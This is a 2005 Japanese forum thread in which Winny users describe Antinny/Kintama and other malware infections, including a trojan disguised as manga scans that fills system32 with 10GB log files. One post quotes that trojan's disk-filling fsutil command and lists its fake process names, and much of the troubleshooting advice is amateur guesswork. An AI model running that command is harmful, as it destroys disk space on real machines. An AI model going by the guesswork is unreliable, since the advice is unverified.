system32に10GBのupdate001.logが作られる。 再起動すると消したはずのupdate001.logが元に戻り、 新たにupdate002.logが作られる… nortonは反応せず。
お、新種か?
新種というより、ただのトロイであって 先生が検知しないブツはnyに限らず各所に転がってる nyを狙ったというのは、感染後nyに撒くとか、なんかその手のブツに 対して使うべきではないの?
10Gもあったら俺の40GしかないHDDはパンクする
>>390 もともとはnyで流れてたのを誰かがうpろだにうpしたみたい。
394 :
[名無し]さん(bin+cue).rar :05/03/04 12:04:37 ID:66jfn8lg0
マイドキュメントのデータを消したり流したりするウイルスが あるらしいけど、そのため、マイドキュメントを使用してない人は、 mp3,画像データ,その他、などのデータ類を、どう保存や管理して るの?
>>394 好きなところに保存すればいいじゃん。
つか、お仕着せのマイドキュメントなんてこわくて使えない。
ソース管理者の人、聞きました? マイドキュメントだけが危険だと信じてる人達がいる今がチャンスですよ
おk
まあ、結局何処にあるか分からないからマイドキュ消すのが一番
アホばっか
入れなおすのが一番
カモばっか
ばっかって言う奴がばっか
>>386 ライブアップデートが当たっている限り、マルウェアで検出できないことはない
と公言していたとオモタ。
>>396 お前、馬鹿すぎ、なんでマイドキュメントだけのわけないだろ、
どう読んだらそうなるんだよw
なんでマイドキュメントだけのわけないだろ
↑文章がおかしくね?
∧_∧ ( ´・ω・) みなさん、お茶でも飲んでもちついて・・・・。 ( つ旦O と_)_) 旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦
408 :
386 :05/03/04 18:51:19 ID:PBrGtJDN0
>>403 ライブは完璧なはず。ウイルス定義は3/3日付け。
exeクリックで感染した。感染する前も後もスキャンで無反応。
一日様子見てみたがこれに関しては話題でないね
俺のはupdate001.logがどうのこうのじゃなくて、症状は普通にキンタマ。
しょうがないからレジストいじって駆除はしたが、気持ち悪いな・・・
先生がバグってるかはないと思うんだけどな
まあ俺だけっぽいから消えとくわノシ
409 :
[名無し]さん(bin+cue).rar :05/03/04 18:56:52 ID:HgpWQWj/0
クソワラタ
411 :
[名無し]さん(bin+cue).rar :05/03/04 19:23:17 ID:Zgltoq+n0
update 無限に増えるんですが リカバリと復元以外の対処法教えてくだふぁい(´・д・`)
意味不明だと思うひと、挙手願いまつ。 つ
つ
414 :
[名無し]さん(bin+cue).rar :05/03/04 19:30:47 ID:Zgltoq+n0
>>414 >リカバリと復元以外の対処法教えてくだふぁい
ノートンが反応しないような新作を、一般人に対処法がわかると思うかい?
おとなしくリカバリ汁!
その前にシマンテックにウイルス検体提出しといてね
416 :
[名無し]さん(bin+cue).rar :05/03/04 19:53:18 ID:Zgltoq+n0
うっはだるいな。エロ動画とか映画とか消せねえよ。。。 別に消し続けてたらめんどいけど害はないし 対処法が出るまで我慢するかな・・・ レジストリいじって直るなら誰かうpきぼんぬ
>>416 新種なんだからレジのどこか分かる訳ねーべ
>>416 新種なんだから無害かどうか分かる訳ねーべ
後で泣く前にリカバリしておくほうが良いと思うんだがな。
【症状】WINDOWS¥system32内に15分おきに10Gのupdatexxx.logファイルを作成。 画像うpなど、他にもあるかも? 【対象OS】Windows XP 【感染原因】winny及びアップローダー上の少年誌連載漫画のスキャン画像フォルダに 偽装したexeファイルを実行することにより発症。 【その他】fsutil.exeが関係? 今のところ、ウイルススキャンには反応せず。 システムの復元でファイルの増殖は止まったとの報告あり。(ダメな人もいた。)
ハッシュとか何か手がかりになることはわからんのん?
偽)svc[2バイト文字]host.exe 本)svchost.exe *重複してることと、実行した時間体にできたもの。 レジストリ C:\WINDOWS\System32\svc[2バイト文字]host.exe になってるから C:\WINDOWS\System32\svchost.exe に直せばいいんじゃないかな。 詳しくないからわからん。 HDDを圧迫するexeは容量10G以下のPCだと なにもおこらないっぽい。
ctFmon.exe ime\imejp\imejpmIg.exe dlLhost.exe svcHost.exe …かもです ふたつめはご丁寧にディレクトリ掘って格納するらしい
プログラムgomiplus2 を特定しますた…やっと fsutil filecreate new %windir%\system32\updateXXX.log 10737418240 を実行するらしい もうちょっと調べてみるっす…
直らない。・・・ svchostも2バイト文字じゃないけど2個ある 他は異常なし。 プログラムgomiplus2 を特定しますた…やっと fsutil filecreate new %windir%\system32\updateXXX.log 10737418240 は意味が分からん 復元は回避したい システムの復元をするとマイドキュメントの中身が消えた。 別の手を考えようとあれこれ試したがsvchostやdllhostに触っただけで また10Gのテキストが出来てる。 プログラムgomiplus2 は特定できなかった。 結局はシステムの復元をしたほうがいいと思う。 しかしマイドキュメントの中身が消えるのでバックアップで ファイルの復元をしないといけない。 それでも全部は戻らないのであらかじめマイドキュメントの中をすべて 新しいフォルダにコピーしておき別の場所に保管しておくことを薦める。 復元で消えたドキュメントファイルをコピーするか移動させればいい。 怖いのは、あれこれ試したのがいけなかったか?時間をかけたのが悪かったか? やればやるほどマイドキュメントが消えていくんだ。 自分の場合は最終的にマイドキュメント丸ごと全部と その他のフリーソフト(少なくても3種類)まで消えてしまった。 どれもずっと前にダウンロードしたものなので1週間くらい復元でさかのぼっても 消えるはずのないソフトだったのに・・・・。 専用ブラウザが消えたので今はIEから書いているほどだ。 とりあえずシステムの復元によってsvchostやdllhostは消えたようなので しばらくはこのまま様子見する。 まだ他にも影響が出ているかもしれない。
>どれもずっと前にダウンロードしたものなので1週間くらい復元でさかのぼっても 消えるはずのないソフトだったのに・・・・。 おまえ復元が分かってないだろ
PC初心者行った方がいい奴多すぎ
だからカモられる
多い?少ない? 3人に1人はインターネット「上級者」 ・インターネットコム株式会社 と 株式会社インフォプラント による、利用歴 3年以上のインターネットユーザーへ対する調査によると、自分は「インター ネット上級者」だと思うと答えたユーザーは合わせて33.4%だった。 調査対象は全国20代〜50代の利用歴3年以上のインターネットユーザー 300人。 年齢層は20代27.7%、30代40.0%、40代25.3%、50代7.0%。男女別 構成比は男性42.3%、女性57.7%。
女でPC詳しい奴なんてリアルで見た事ないな…
>>431 自称上級者多すぎwww
つか上級者ってなんだよwww
>175 SMTP用のポート25をnyに割り当てた相手の問題でこっちは関係ないってことか。 俺も2回ほど同じことあったからウイルス喰らったかと思った。 でもこっちの送信元ポートがnyに割り当てた番号じゃないのが気になるが。
>>434 >でもこっちの送信元ポートがnyに割り当てた番号じゃないのが気になるが。
そりは総合質問スレのテンプレ22−FWの設定の仕方−に考えるヒントがあるべさ。
436 :
416 :05/03/05 01:13:33 ID:TfZcMJrU0
バックアップ所か、2日前買ったPCなんでね。 相当Winnyで落としまくったし、ブックマークも終えたし、ウイルスバスターも入れたのになぁ。 これからバックアップとるぞって矢先になったんで。 さっさと駆除できるようにうpデート汁!
>>432 俺のバイト先では音楽CD焼くなら誘電、アゾが、ジッターがどうのこうのやら
助言を教えてくれた女子がいました
>>436 まずは購入直後の状態のイメージをとるのが俺の基本。
だって万が一の時でも、リカバリするよりイメージ復元の方が早いもの。
まぁ2日ならまだダメージ浅いだろ。
授業料として甘受するのだな
439 :
[名無し]さん(bin+cue).rar :05/03/05 01:49:18 ID:7x4WEqbm0
トレンドマイクロオンラインスキャンで、15のウィルス感染が報告。 WORM_ANTINNY.lが10個 WORM_ANTINNY.Aが3個 WORM_ANTINNY.GとWORM_ANTINNY.Bがともに1個 しかし感染ファイルが読めません(C\RESTORE\TEN....となり省略部が読めない) このファイルの検索法と駆除法を教えてください。お願いします。 【使用OS】 ME 【WindowsUpdateしてるか】 はい 【使用AntiVirusソフト】 なし 【Winnyのバージョン】 2b7.1 【Winny歴、総DL量】 1年くらい 総DL 多分50GBくらい 【テンプレを読んだか】 はい 【テンプレにある対策を実行したか】 ↓にまとめて 【症状、具体的に分かる限りすべて書く】 ↓にまとめて 【何をしたらそんなことになったのか】 過去に感染したことがありその時は対処したが、今回はexeファイルに細心の注意をはらっていたつもりだし実行した記憶もないのにいつの間にか感染していて焦ってます。 exe検索してもフォルダのやつは出てこないし(解凍時に出てきたことはあったが即ゴミ箱で捨ててます)、感染ファイルを持っているだけなのかそのウィルスが実行されてるのかとかもよく分からないんです。 正直言って今の自分のPCが危険な状態なのか、その手前なのかも分かっていない状態です。ごめんなさい。
ANTINNYなんて自業自得なもん、端から相手にされないんじゃないの?
>【使用AntiVirusソフト】 なし
>exeファイルに細心の注意をはらっていたつもりだし
>実行した記憶もないのに
論外。ウィルス上等わが道をゆく主義なら,最後までオレ流を貫け。
第一、削除したってすぐに再感染するに違いないから無駄手間。
>>442 セキュ板でも誰も相手しませんよ。ny厨カエレで終いですよw
439です。 向こうでもおっしゃるとおりの反応をされました。 確かに自業自得ですね。。。 自分のけつは自分で拭くことにします。 というわけで、ドキドキの初OS再インストに向けてこれから下調べと下準備に取り掛かります! それでは! がおーーー!きあいだー!
445 :
416 :05/03/05 02:45:22 ID:TfZcMJrU0
システム復元で何とか増殖はとまった。 このPC一日おきに記録してて助かったよ。
で、問題ウィルスに対応するようになるのはいつ頃だ?
>>446 作り手側のことも少しは考えてくれ。
そんなに早く対応されたら正直やってられんよッ!
ウィルス対策ソフトを無料にしてくれたら文句は言わないがな
ウィルスソフトの会社が自演でウィルス作ってるの?
>449 日々大量のウイルスが世界中で造られているというのに 余計な人件費を使う必要があるのか考えてみたのかよ
「うん」なのか「うそ」なのか・・・悶々と悩んでいるオレorz
つーか「ウィルスソフト」の会社なら作ってるだろーな 会社組織でやってるかどーかは知らんが ウィルス対策ソフトの会社ならそんなヒマも金も無いだろ まぁ其処の社員が個人的に何かやってる可能性は否定しきれんがな
そーいや、サッサー作った高校生の少年は今頃どうしてんだろ ヘッドハンティングされてんのかね
捨てる菌ありゃ拾う菌あり
バスター使用ですがイメージファイル形式までスキャンしてくれないようです。 イメージファイルをきちんとスキャンできるセキュソフトでお勧めなのがあったらよかったら教えてください。 スレ違いですみません。。
やると思った。
459 :
[名無し]さん(bin+cue).rar :05/03/05 16:34:35 ID:25pOBPmO0
ビックカメラで、アンチウイルスソフトを購入しようと入ったら ノートンとトレンドマイクロがあって、そのノートンの店員に 超えかけられてノートンをすすめられ、今度はトレンドマイクロの店員 にも声かけられて、おすすめされて、もうわけわかんなくなった。
ウイルスバスター2005を購入したけど、ウイルスを検出してくれません。 ソフトウエアの中にマイクロソフト製のウイルスがあるのですが?
そんな釣りで俺様がクマーー!! ,,_ \ r'o p。`、 \ l ,.- 、ヾ r' `ー- 、 \ l '-‐‐-' ,' ' , .;;.`l \ ', j ,i' ,, '' l \ 〉 k , ' ,ノ \ ,' ', , ' ,' \ 7 l , ' ,' \ ,' ,' , ' ,' \ ,, ,.-‐--.,,__ ,' , , ' 、 ,' ,' \r''"´ , ` '" `'、 ,' (´⌒qヽ , ' ,' ,、n_ノ , ' _r-‐- 、 l' ' 、 _, ' ., r-' _,-‐q i ,' ,.‐-、_,,ソー'´ , ; 、_γ l , ,' r‐'´g ri :: ,' '、 r_, 'l :´ `ヾ ,.' `、 r, i | : ' , ` 、 j ' , ' t、o_ tj :: ' , 、`ー--,'.: _,ノ `ー-‐'´ `ー----‐'"`ー、`____;'-、 ,-' `゛"''''''"
ああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああ
>>464 ちゃんと毎日パターンUPしたり、検索エンジンもアップデートしたりしてます。
ん〜どうして僕のPCにはウイルスが居ないのでしょうか?
シャイなんだよ。
ウブなんだよ。
468 :
317 :05/03/05 20:38:52 ID:JcIABgBMO
お願いします
470 :
[名無し]さん(bin+cue).rar :05/03/05 21:47:03 ID:3sckGPg70
【使用OS】 WinXP home SP2 【WindowsUpdateしてるか】 している 【使用AntiVirusソフト】 ウィルスバスター2005 【AntiVirusをUpdateしてるか】 している 【ウイルススキャンの結果】 ウィルスなし 【オンラインスキャンしたなら結果】 ウィルスなし 【Winnyのバージョン】 V.6b66 【Winny歴、総DL量】 3ヶ月 20GBぐらい 【テンプレを読んだか】 よんだ 【テンプレにある対策を実行したか】 該当なし 【症状、具体的に分かる限りすべて書く】 スタートボタン→終了オプション→電源を切る→電源OFF→自動的に再起動 【何をしたらそんなことになったのか】 winny接続6時間 【これまでにとった措置】ウィルスチェック、スパイウェアチェック、スキャンディスク、チェックディスク、fixboot、fixmbr(回復コンソール) 再インスコしかないんでしょうか・・・・
呪われてるんじゃねーの?
<470 アホみたいな話だが、終了オプションで「再起動」にチェックが入ってるとかは? とりあえずアンチニーの仕業ではないと思う。
>470 Hard側かもよ。変な周辺デバイスが動いてないか? つか、何でもかんでもニュイルスのせいにするなよ。
474 :
[名無し]さん(bin+cue).rar :05/03/05 22:19:51 ID:3sckGPg70
確実に終了選んでますし、 周辺デバイスは動いてないです。 今までは正常に使えていたんで・・・
余所のnyが接続に来たのを感知して起動してるんじゃねーの? PC落としたらLANケーブルも抜いとけ
476 :
470 :05/03/05 22:37:11 ID:3sckGPg70
BIOSのWakeupLanを切る
決め打ちでMagicPacket送信して、WakeupLANから起動させてる としたら、たいしたもんだな。正直ガクブルもんだ。(((( ;゚Д゚)))
479 :
ひみつの文字列さん :2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
482 :
470 :05/03/06 00:24:11 ID:Wg7jR/ie0
>>470 自作機?
ツレのPCも勝手に起ち上がる事があったんだけど
その時の原因はマザーボードとケースの短絡だった。
アースがきっちり取れてなかったのと、マザーの取り付けの
時に、間に絶縁シート(赤い丸いヤツ)挟んで無かったため。
電源やマザーのコンデンサとかが劣化したらなるのかな?
最後の方は、ケースの横面をコツンと叩くだけで電源が入って
それはそれで便利だったそうだ (w
>>482 電源消しても、しばらく勝手に起動する現象の事かな?
それはメーカー製のPCによくあることなんだけど、
解決法はあるんだけど、もし質問の内容がそうじゃなかったら
悪いので・・・。
板違いの話を延々とやられる方が迷惑だ
486 :
481 :05/03/06 01:26:34 ID:48CJP9Kl0
落ちてきた(・∀・)
>>486 既存ウイルスなら種類教えてくれ賜う。
未知ウイルスなら分離してパスロックかけてうpよろ。
ってかPandoraってニュイルスばっかじゃん。 ん?だからPandoraって言うのか…。妙に納得。
教えてください、将軍様 イメージファイル形式のアプリを落として解凍 ここまででノートン氏のスキャンでは問題ないようですが イメージをマウントした時点で発動するウィルスってあるの?
>>489 あんたからマウントとった時点で殴り出す人はいると思う
10Gニュイルスの対処法は?まだ?
「ザクとはちがうのだよ! ザクとは・・」
ガンダムだけであと100年は荒稼ぎできる
>>479 アンチウイルスツールが検出するウィルス
ニュイルス(新型)じゃない
ただ先生やAVGはW32.Pinfi(Win32/Parite.A)って検出するんだけど、
実態はぬるぽテキスト型(たぶん既出)なんだよね
これは誤検出なのか、広義の亜種なのかよくわかんね
少なくとも
>>337 のリンクで書かれてる対処方法じゃダメなのは確か
キンタマで自分の個人情報流れてるか知る方法ないのですか? マルチで申し訳ない。
検索する
ヒットしたら落としてみる
499 :
[名無し]さん(bin+cue).rar :05/03/06 17:05:43 ID:FI9zmLOa0
[キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh とかいうの落として見たいんだけど これ自体にウイルスって入ってるのかな?
心配なら.lzhはやめておいた方がいい
>>498 >>479 は違法なので捏造警告指定してあったが再キャッシュ化しといた
終わったら言ってくれ
何故ならば
____ r っ ________ _ __,、 r っ r っ | .__ | __| |__ |____ ,____| ,! / | l´ く`ヽ ___| |__ r‐――┘└‐――┐ | | | | | __ __ | r┐ ___| |___ r┐ / / | | /\ ヽ冫L_ _ | | ┌─────┐ | | |_| | _| |_| |_| |_ | | | r┐ r┐ | | | / | | レ'´ / く`ヽ,__| |_| |_ !┘| ̄ ̄ ̄ ̄ ̄|‐┘ | r┐| |___ __|. | | | 二 二 | | |く_/l | | , ‐'´ ∨|__ ___| r‐、 ̄| | ̄ ̄ | |_.| | / ヽ | | | |__| |__| | | | | | | | __ /`〉 / \ │ | |  ̄ ̄| | | / /\ \. | |└------┘| | | | | |__| | / / / /\ `- 、_ 丿 \| | ̄ ̄  ̄ ̄ く_/ \ `フ |  ̄ ̄ ̄ ̄ ̄ | | | |____丿く / <´ / `- 、_// ノ\ `ー―--┐ `´ `‐' ̄ ̄ ̄ ̄ ̄`‐'  ̄ ` `´ `ー' `ー───-′
スポンサー誰だよ!
オレオレ
ホラー
しかもスプラッタ
____ r っ ________ _ __,、 _ _ ___ _ | .__ | __| |__ |____ ,____| ,! / | l´ ,! /_| |__ | | ! /____,、 | | | | | __ __ | r┐ ___| |___ r┐ / / | | /\ / __ __| | ロ .| / __ __l´ | |_| | _| |_| |_| |_ | | | r┐ r┐ | | | / | | レ'´ / く_/___| |___ .| ロ .|く_ハ< | | | r┐| |___ __|. | | | 二 二 | | |く_/l | | , ‐'´ |___ ___| | ロ .| ヽヽ// | |_.| | / ヽ | | | |__| |__| | | | | | | | __ / ヽ |__ .__| } / | | / /\ \. | |└------┘| | | | | |__| | / /\ \ / ヽ / ハヽ  ̄ ̄ く_/ \ `フ |  ̄ ̄ ̄ ̄ ̄ | | | |____丿 く_/ \ `フく_/\`フく/ \`フ
やっぱりな・・・
スポンサーの俺が至らないばっかりに・・・orz
いや、スプラッタなんて企画出した俺が悪いんだ‥‥orz
>>514 マーケティングリサーチをしっかりやるとか
企画を充分煮詰めておくとか
予算管理をしっかりするとか
問題有りそうなスタッフやキャストは使わないとか
つか、マジで10Gウイルスどうすればいいんだ…orz
システム復元で症状はおさまったよ。 gomiplusてのがどこにあるのかは分からん。 残ってるなら消したい。
検索もできない奴がnyやるな
出 部 こ __ 来 屋 の / \ る .を ス / ノ┼ー ヽ だ 明 レ | ─┴─ | け る を ヽ | ̄ ̄| / 遠 く ご \  ̄ ̄ / .く し 覧  ̄ ̄ か て に ら ` .な /\___/ヽ /\___/\ ご る /'''''' '''''':::::::\ / ⌒ ⌒ ::: \ 覧 .時 |(●), 、(●)、.:| | (●), 、(●)、 | く は | ,,ノ(、_, )ヽ、,, .::::| | ,,ノ(、_, )ヽ、,, | だ | `-=ニ=- ' .:::::::| | ト‐=‐ァ' .::::| さ \ `ニニ´ .:::::/ .\ `ニニ´ .:::/ い `ー‐--‐‐―´. `ー‐--‐‐―´´
520 :
[名無し]さん(bin+cue).rar :05/03/06 22:28:49 ID:BMM3MLbd0
動揺しててageてしまったorz
524 :
[名無し]さん(bin+cue).rar :05/03/06 22:40:55 ID:aKn7FZgI0
いくらなんでもネタ画像だろ
キンタマにやられてデジカメの画像とかも全部やられてしまった・・・ 娘の1歳の誕生日の画像とかあったのに・・・ こんな馬鹿な父ちゃんを許しておくれ ozr
娘の1歳の誕生日の画像とか、nyで流れてる?
愛娘がペド野郎共のオカズにされるのは哀れな気もするが まあ、晒されたっていいじゃない 泥棒だもの
大事なデータ入ったPCでnyをやること自体信じられない
トレンドマイクロに登録されているAntinnyども。 A B C E G H J K P Q V X Y しばらく見ない間にずいぶん増えたもんだな。YとかVとかきいたことないし。
アルファベット使い切ったら、Ωとかになるのかな
まさか2byte文字を使う事はないだろ。
A〜Z AA〜AZ BA〜BZ 以下同様 場合によっては制御コードが混じる2byte文字を使う訳が無い 脳は生きてる内に使っとけや
534 :
[名無し]さん(bin+cue).rar :05/03/07 04:49:16 ID:vNw8fYx/0
01/01
_□
('A`) v ( ) ( ) ( ) ( )
| ̄ ̄|ノ) 田ノ( )V( ) ( )V( )
| ̄ ̄ ̄ ̄ ̄| | | | | | | | |
01/05
⊂⌒ヽ (⌒⊃
\ \ /⌒ヽ / /
⊂二二二( ^ω^)ニニ二⊃
\ \_∩_/ /
( (::)(::) )
ヽ_,*、_ノ ブーン
///
///
01/06
_[警]
( ) (^ω^ )
( )Vノ )
| | | |
01/07
< ̄☆>
⊂二二二( ^ω^)二⊃
| 警 /
/⌒ヽ ( ヽノ
⊂二二二( ^ω^)二⊃ノ>ノ
| / 三 レレ
( ヽノ それが人権擁護法案クオリティー
ノ>ノ
http://that3.2ch.net/test/read.cgi/gline/1110125487/ 三 レレ
Bagleなんかのバージョン文字列は、とっくにダブル表記だな。
536 :
[名無し]さん(bin+cue).rar :05/03/07 15:06:28 ID:Br34Hoaz0
A列車で行こう7 マウントしたら 「ウイルスだったら HDアボーソだったぞ」 と出た。 実害はあるのかなあ?
>>536 「無い」って言ったら信じるのかい?
心配ならフォーマットしてOS再インスコしとけ
家に帰ったら 「俺が泥棒だったら金目のもの盗まれてるぞ」 っていう置き手紙があるようなものだな。 いやそれ以上か。 まぁそれで経過を見守って見るも一興
239 名前:(´Д`) ◆maohDL64.s [sage( ゚Д゚)<ポカーン] 投稿日:05/02/06(日) 01:32:47 ID:2gSt18n70 つーか、そういう物は即効性が重要な訳で。 わざわざ時限式ですよなんて教えてやる必要もないのだ。 対応されちゃったら無意味な訳だし。 おいらの結論:何の心配もしなくてよし
ダウンロード板ってレベルの低さは初心者板のようなものだな。 いやそれ以上か。
俺が仕組むなら、 フォーマットを気にするようにFakeで仕向けておいて、裏でトロイ
autorunからbatファイルを実行させるタイプのやつって CDイメージをスキャンしても検出してくれない autorun無効にしてマウントしてスキャンしても無理。 Nortonじゃあ検出できないだけ?
裏でトロイ←もうね、(ry
>>542 batファイルを読め。
話はそれからだ。
>>542 ここで扱うニュイルス(新型)は、
基本的にNorton等のアンチウィルスツールを更新して使っていても検出されないもの
キンタマが出た時点でデスクトップ晒し上げだけでなく キーロガー仕込んでそのログを垂れ流すような亜種も 出るだろうとか思ってたんだが未だに遭遇しない。
>>544 いや正確に言えばautorunからexeを実行させるタイプなんだよ
>>545 刷れ違い?ごめん
>>547 batファイルがテキストの従来からあるタイプなら、
対処は
>>544 でスレ違いだが、バイナリならスレ違いじゃないと思う
>>540 その日本語だと、ここが初心者板より上なのか下なのかよくわからんな。
まぁ文脈で初心者板よりひどいって言いたいのはわかるけど……
しかし実際は二極分化してるだけなんだけどな。
正しくは「初心者」「上級者気取り初心者≒540」「上級者」か。
あーちなみに俺も初心者に毛の生えた程度難で悪しからず。
初心者とか上級者とかそういう分類自体が滑稽でたまらん
うはw日本語下手ですまんwww
上級者っていうか、ウィルス開発者レベルの人は ROMってニヤニヤしてるだけだから、 書き込んでる奴は9割方素人
ウィルス開発者レベルの人は ROMってニヤニヤしてるだけだから、 これを断言できる根拠は何処から沸いてくるのかと
おれ上級者だよ
おれは中級者
>>553 そんな奴が初心者の溜まり場になってるこのスレに入り込んで、
煽ったりQ&Aに参加したりすると思うか?
開発者なら煽ったりする時間があれば自前のウイルスを強化するだろ
>>556 人を嘲笑したり弄ぶのが楽しいからウィルス作ってんだろ
ウィルス作ってニヤニヤするのは初心者煽ったりするのと一緒
参加してると思うけどな。
まぁ想像の世界だし終着点は無いから何とも言えんがな
お前ら、スレ違いはその辺にしとけや
俺はもっと不思議
このスレにいる(というかたまに流れをチェックする)んだが あー、単に状況を知りたいという好奇心かな。 ある程度の解析情報は提供するけど、最近暇がないんでVPC立てて検証するほどじゃない。 新種の動きとか、業界(?)の対策とか、P2Pの今後とかネタでもあるので できることはするし、できないことはしない。 スキルつーか、開発できてもリスクでかいからしないなぁ。
漏れは慌てふためいてるお馬鹿達をヲチしてニヤニヤするのが日課
空しい日課ですね
質問です。 以下挙げる三回とも急にバスターが緊急ロックという動作をしたらしく インターネットを切断され、PCを再起動しなくてはならないことがあったのですが、 どういった症状なのでしょうか。 バスターのパーソナルファイヤーウォールのログに経歴が残っていたので 晒しておきます。 ログ欄には「ネットワークウイルス」となっていました。 3/4の21:41 今日の11:08 続いて15:33 と各回とも違う送信元IPから来ていました。 ちなみに今日の二回ともnyも起動しており、 緊急ロックによりnyも停止していました。 (ただ初回時はnyを起動していたかどうか覚えていません)
>>563 激しくスレ違いの上に、情報が欠落し過ぎ。
だな まずは君にお姉さんか妹がいるかどうかくらい書かないとね
この板にも春が来たか 俺にも来ないかな
繁華街に行けば売ってるから、好きなの買ってくると良いよ
で、10Gウイルスはどーなったの?
>>568 これが10Gに関係あるかどうかわからないけど
今朝のノートンupdateでトロイ発見。
c:\WINDOWS\IME\IMEJPのimjpmig.exe駆除で10G収まった。
こいつが原因?
570 :
[名無し]さん(bin+cue).rar :05/03/07 23:09:29 ID:D2HLD7SO0
よそで質問したところ、こちらに案内されたので質問させてください。 いつから感染してるのか不明ですが、右クリックからワードやエクセルの 新規文書を作成すると、92kbサイズでヘンなファイルが作成されます。 中身にはAAと「ぬるぽ」と書かれてます。アンチウイルスやスパイウエア 検出等いろいろ調べたのですが、よくわからないのです。 どこかにフォルダができていたり、regeditとノートパッドが入れ替わったりと キンタマ系の特徴は見当たらないので違うと思うのですけど・・・ 環境はWIN2000、Office2000です。 システムのアップデートは欠かしていません。アンチウイルスはAVGを 入れてあります。 どなたか、この状況を回避する手段わかりませんか?
時限発動済みの ぬるぽ亜種。 その症状が出るときは、感染後時間が経って、すでに末期。 HDD全消去というか、特定拡張子ファイルのAA上書きが、いつ起こるかわからない 対処法だが、あんたのレベルだと、フォーマットして再インスコが一番。 データ含めて、失われたものはあきらめる。
ひどい事するなぁw
スタート準備動作の画像 という所は深読みするとちょっと怖いな。
10Gのウィルス?の対策でOS上書きインストールしたら直った。 復元ポイント作ってなかったし、クリーンインストールは面倒だからためしにやってみたら見事直ったって感じだ。
>>573 こういう板での場合はいいんだけど、知り合いにちょっと画像を弄っていちいち報告
してくる奴がいてウザイ。面白くも何ともねーし大して加工うまくもねーのにw
つーか以前明らかに差別的な内容の画像を送られて人間性を疑ったよ。
っとスレ違いすまそw
日記はチラシの裏にでも書いてろ
>>579 まて!578を立て読みしてみろ・・・
こしつっ
ネっトをやるやつがよくしてしまう行為・・・そう、固執だ。
タンに日記だと誤解するのはまだ早い!
投げかけてきているんだよ彼は!
下らないお前らがそんなに固執しているHDにそんな価値はあるのか?
しかも地の文章にある「ウザイ。。面白くも何ともねーし大して加工うまくもねーのにw 」
てんぐになっている解析者とふざけた情報しか出さない質問者に対する明らかなる批判の声だ!。
みんなよく考えるんだ!
るふされた情報に惑わされずに
よく自分の頭で考えろという・・・アナグラムだったんだよ!!!(すいませんこれは言ってみたかっただけです)
まこ?
うお!それは見逃してくれ・・・
う?w
まこはフェイクという高等技術だったんだよ!?
ファイルのスキャンはavast! Antivirusでは不充分ですか?ノートンとか無いんで・・・
圧縮ファイル開く前の確認とかならぶっちゃけ不要 自分で内容見るなりして判断しろ プログラムファイルの判断やキンタマ踏んでHD内にウイルスが撒かれてる等の状況なら必要だが フリーでAntinny系への対応がいいのはBitDefender、AVP、Trend Microあたりらしい
な訳ないだろ 安心したいなら常駐ソフト買っとけ 常駐してても安心できんけどな
春っぽくなってきたな…
589 :
585 :05/03/08 08:44:20 ID:54MFW5Ww0
まこネタキボンヌ
まじで こわいニュイルスおせぇてください
585 avast!かAVG+BitDefender+System Safety Monitor+一応、ファイラーも これでAntinnyもこわくないだろ
まったくたて読みなんてくだらねえ こんなことするくらいならオナニーしてる方がマシ
マイドキュメントによくわからん コワイ画像がいつのまにか入ってた。 おかしいなとか思ってたら とつぜんマイドキュメントのフォルダ削除 なぜだ・・・orz
俺のパソにもバスターマシンさえいれば・・・。
俺のPCにもガンバスターさえいれば・・・
オレのマシンにも可愛い妹がいれば・・・
PCの中から「お兄ちゃん!」て聞こえるのか?
「あれ?何故スピーカーでなくケースから声が?」 と思いケースを開けてみるとそこには幼女が入っていたってそんな話ですか! さすがはDL板!
油で黒光りする羽の幼女がいる可能性はあります
まぁまぁ こんな事で騒がずのんびりやろうぜ
604 :
[名無し]さん(bin+cue).rar :05/03/08 11:07:01 ID:QORH02XX0
初心者でスレ違いかもしれませんが質問させていただきます。 トレンドマイクロのオンラインスキャンでAntinny.Aが検出されました。 で、感染ファイルの削除とwinnyフォルダごと削除、 レジストリとwin.iniの修正はしました。 色々調べたんですけど、結局このAntinny.Aが行う動作は、 キャッシュのクリアと自分のコピーをUpフォルダに 置くだけなんでしょうか? デスクトップのSSとかファイルを勝手にUpするウイルスとは 別物と判断していいんでしょうか? どうぞよろしくお願いいたします。
>604 マイドキュメントとデスクトップ下位フォルダ全部nyに揚がってると思うよ。
>>604 いまどきAntinny.Aに犯されてるくらいだから、ほかにもいろいろ
ありそうな悪寒。オンラインスキャンを信頼してそのまま使うのも
いいし、石橋を叩いて初期化&新規インスコするもよし。
607 :
604 :05/03/08 11:21:55 ID:QORH02XX0
ありがとうございます >605、606 ってことは、Antinny.gとかと同じ動作をするんですか? とりあえず再インストールはすることにします。
【使用OS】 XP 【WindowsUpdateしてるか】 Yes 【使用AntiVirusソフト】 NAV、NIS 【AntiVirusをUpdateしてるか】 Yes 【ウイルススキャンの結果】 未検出 【オンラインスキャンしたなら結果】 No 【Winnyのバージョン】 未使用 【Winny歴、総DL量】未使用 【テンプレを読んだか】 Yes 【テンプレにある対策を実行したか】実行予定 【症状、具体的に分かる限りすべて書く】 カレント以下のフォルダ削除、(・ё・)〜.jpgファイル複数 【何をしたらそんなことになったのか】 アップローダ経由。フォルダアイコンに〜.exe。約4MB。削除しようとして誤ってダブルクリック 【これまでにとった措置】 スキャン、システムフォルダのexe・スタートアップ・reg起動実行の差分チェック(変化なし) 既知か未知か、既知であれば関連の情報しりたいです。
意味が解らん
マイドキュメントの中身が全部消えちまったんだ・・・ このままじゃ俺の大事なデータがなくなっちまう!だれか レクチャーしてくれると助かる! いっしゅんにして全部消えちまったんだよ・・・ プゲラとか言ってる場合じゃネエヨー! しけた意見はいらねえ! てめえらの知恵を待ってるぜ!
>>608 ウイルスプログラム本体が残ってるならどこか大御所のオンラインスキャン試してみれ。検出されるかも
ってかあぷろだ経由ならなんでAntinny関係だと思ったんだ?
>>610 片仮名交じりとかイクナイ
(^ω^;)プギャー
プゲラ
>>608 意味がわかんない。
症状は何かね?
10Gウイルス?
